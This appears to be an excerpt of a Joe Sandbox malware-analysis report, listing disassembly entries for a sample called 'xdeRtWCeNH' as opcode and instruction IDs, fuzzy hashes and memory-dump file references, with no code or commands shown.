                                                            • Instruction ID: 87a04f2e1712b04e5b433f4f3bbe615239a0b05288523d51993ea1a46f311534
                                                            • Opcode Fuzzy Hash: c42f6979be81f07556e43c8695cca7b70edd22fabc9c2ff7665ecb70675b30c7
                                                            • Instruction Fuzzy Hash: 6DC17DB26056018BCB28DF19C4906A5FBE1FF95310F29876DD5AA8F781C734E9C5CB84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • Opcode ID: 49e37e3fb03f93da9d9d649f0b3f10027f9cefc4c25519c2e446c373813ed613
                                                            • Instruction ID: a959698f7217860e2e4647a2f23b133e15a027802d06e33a79c7d3ec13779bc3
                                                            • Opcode Fuzzy Hash: 49e37e3fb03f93da9d9d649f0b3f10027f9cefc4c25519c2e446c373813ed613
                                                            • Instruction Fuzzy Hash: D8A148716283514FCB14CF2CD48062EB7E6AFC6310F5A862DE5959B3A2E738DC558BC1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • Opcode ID: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                                            • Instruction ID: e85c9d79413c1a8c5043f2213da4eb0c1f5e163b7794980f1cd74462fb33dbd6
                                                            • Opcode Fuzzy Hash: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                                            • Instruction Fuzzy Hash: E4A1B335A401598FEB39EE24CC81FDA73A2EBC8310F0AC164ED599F391EA34AD058791
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • Opcode ID: 982674e0dc20dd5e5174ed9f3af8dff019532cb307d8942e3142b1571729c964
                                                            • Instruction ID: e9c04b5f5d3554bc3ec649666a7039049841bf7e5cd54b98e7c2b8f965603c44
                                                            • Opcode Fuzzy Hash: 982674e0dc20dd5e5174ed9f3af8dff019532cb307d8942e3142b1571729c964
                                                            • Instruction Fuzzy Hash: 60C1F571954B418BD722DF38C881BEAF7E1BFD9300F108A1DE9EAA6241EB747584CB51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • Opcode ID: 9228b2e0664e23727076b3d62146ba1f4730c88ee1d57561ada81d798ec3a075
                                                            • Instruction ID: a957856dec15b275438e2b812dc4a48c286497625828f751b2975bf85735f22b
                                                            • Opcode Fuzzy Hash: 9228b2e0664e23727076b3d62146ba1f4730c88ee1d57561ada81d798ec3a075
                                                            • Instruction Fuzzy Hash: 0F715F3EA0C6600FDB254A3D58903B9A7E75BCA311F5A467AE4F9C7386C631CC479391
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • Opcode ID: 457f40e7e0796783fa38d0b42298b3cbc9cf43b611fb0b1fcabcd38076ad8d5c
                                                            • Instruction ID: fb46aa10b2685645d570be35416155d7bd9f7e53734a788f891cb3a4fe2eaca2
                                                            • Opcode Fuzzy Hash: 457f40e7e0796783fa38d0b42298b3cbc9cf43b611fb0b1fcabcd38076ad8d5c
                                                            • Instruction Fuzzy Hash: D681D861D0D78557E621AB399A017ABB3E4FFE5344F099B18BD8C91013FB31B9E48342
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Similarity
                                                            • Opcode ID: a03a13edad88e42f3f700af3bd0ade9932a92a0d14983532911a7838f612e48e
                                                            • Instruction ID: 3e79c3e612e5f40d3b77f077eb4cf8a51fc8cc72bf45a76e0ab2425c66a9c673
                                                            • Opcode Fuzzy Hash: a03a13edad88e42f3f700af3bd0ade9932a92a0d14983532911a7838f612e48e
                                                            • Instruction Fuzzy Hash: 2B711636A0CB15CBC7109F18D8A076AB7E1EF99324F19872DE8984B395D335ED90CB91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Similarity
                                                            • Opcode ID: df23d08cf9aa2364d4c0dacd3a42b5788232f51ca43a8a21f87f5dbd82d2ae62
                                                            • Instruction ID: f4bf03b8548eb0feb8a6f8275c9553adce140eb13def996abf30094bee7c8e97
                                                            • Opcode Fuzzy Hash: df23d08cf9aa2364d4c0dacd3a42b5788232f51ca43a8a21f87f5dbd82d2ae62
                                                            • Instruction Fuzzy Hash: BD81EA72D18B928BD3149F28D8806B6B7A0FFDA314F24476EE8D606783E7749581C781
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Similarity
                                                            • Opcode ID: 8f72dafff59e34a0f41a7488fa527fece3082f980fd42512191f69a5d9abe394
                                                            • Instruction ID: 11cf828f47e09ba8f536bb63a643bcfff6d4b7b84056e2b6da50ec2917264322
                                                            • Opcode Fuzzy Hash: 8f72dafff59e34a0f41a7488fa527fece3082f980fd42512191f69a5d9abe394
                                                            • Instruction Fuzzy Hash: F9810872D14BD28BD3148F68D8806B6B7A0FFDA354F249B2EE8E617742E7749580C781
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Similarity
                                                            • Opcode ID: 75b387d9c709531743ebff1b6852bdb737588a16d9b6e63821d9145295ae20a2
                                                            • Instruction ID: a20df3adda384f44ff10a2884273ae93da95b274e002394a0b21d88b31904750
                                                            • Opcode Fuzzy Hash: 75b387d9c709531743ebff1b6852bdb737588a16d9b6e63821d9145295ae20a2
                                                            • Instruction Fuzzy Hash: F7716A73D0D7808BDB128F28C8806697BA2AFC6314F2483AEF8D55B353E7749A41C741
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Similarity
                                                            • Opcode ID: e0a5019bc735679f6d9618e87da0a4f2b0a593f0d85fa850122a77ce8924b6d7
                                                            • Instruction ID: 5e39c1bfa5d7ce6431966ac80471df755c1f686c0968d0e5b27d8b030d55c457
                                                            • Opcode Fuzzy Hash: e0a5019bc735679f6d9618e87da0a4f2b0a593f0d85fa850122a77ce8924b6d7
                                                            • Instruction Fuzzy Hash: 4A41F077F206280BE34CD9799CA526A73C2D7C4314B4A863DDAA6C73D2EC74DD1692C0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Similarity
                                                            • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                            • Instruction ID: 11f1492498680bb76fa6649806542f394cfb270460c683799b21835137d405cc
                                                            • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                            • Instruction Fuzzy Hash: CD31D4393483194BD714EE6EC4C022AF6D39BF8360F55C63CE589C3784E9718C488782
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Similarity
                                                            • Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                            • Instruction ID: fadf2f00c718bc5d40bd5983e53488b6dd34ca9112f2a294b2622374381473fe
                                                            • Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
                                                            • Instruction Fuzzy Hash: BDF04F73B656290BA360CDB66D01296A3C3A7C0770F1FC565EC88D7542E9359C4A86C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Similarity
                                                            • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                            • Instruction ID: a68e367bf3bcc45c1450149b82d6712e693fd7a6af3d42eae9d28d8fcfec269b
                                                            • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                                            • Instruction Fuzzy Hash: C5F01C33B20A344B6360CD7A8D05597A2D797C86B0B1FC969ECA5E7206E930EC0656D5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7c18937efaf70f5dc40750ea1d013ff27389a0366d98e741a87a86b98d454953
                                                            • Instruction ID: 04350472486ecd2af3ebf82170089198a07805dd72995e524f33bd6d3479386d
                                                            • Opcode Fuzzy Hash: 7c18937efaf70f5dc40750ea1d013ff27389a0366d98e741a87a86b98d454953
                                                            • Instruction Fuzzy Hash: 23B012319003004BAB06CA34DC7109232B2B3A2300359C4E9D003C6031D635D0028700
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1589659327.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                            • Associated: 00000000.00000002.1589596663.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1589659327.0000000000D99000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590456887.0000000000D9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000D9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000000F24000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001031000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000111C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590510204.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590876158.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1590987294.00000000012DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1591004957.00000000012DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6c0000_xdeRtWCeNH.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: [
                                                            • API String ID: 0-784033777
                                                            • Opcode ID: c7f0921e477bfd65a45aabe0adba1e5ccab6fbbad3e656c16d28b2599629b469
                                                            • Instruction ID: 8d9b926368b5160ef8a52b7980e252f26b7ee4dad1bb7404b0fe1465b6708e66
                                                            • Opcode Fuzzy Hash: c7f0921e477bfd65a45aabe0adba1e5ccab6fbbad3e656c16d28b2599629b469
                                                            • Instruction Fuzzy Hash: 27B147B19083B15BDB35AA24F8D173A7BD9EF55304F28052FE8C5C6181EB7DE8848762